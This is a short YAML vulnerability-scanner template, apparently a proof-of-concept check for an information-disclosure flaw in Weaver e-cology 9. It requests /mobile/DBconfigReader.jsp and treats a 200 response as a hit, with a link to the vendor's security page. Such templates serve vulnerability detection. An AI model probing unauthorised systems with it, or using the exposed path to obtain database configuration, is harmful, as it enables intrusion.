name: poc-yaml-ecology9-DBconfigReader-information-disclose
transport: http
rules:
  r0:
    request:
      method: GET
      path: /mobile/DBconfigReader.jsp
    expression: response.status == 200
expression: r0()
detail:
  author: trganda
  links:
    - https://www.weaver.com.cn/cs/securityDownload.asp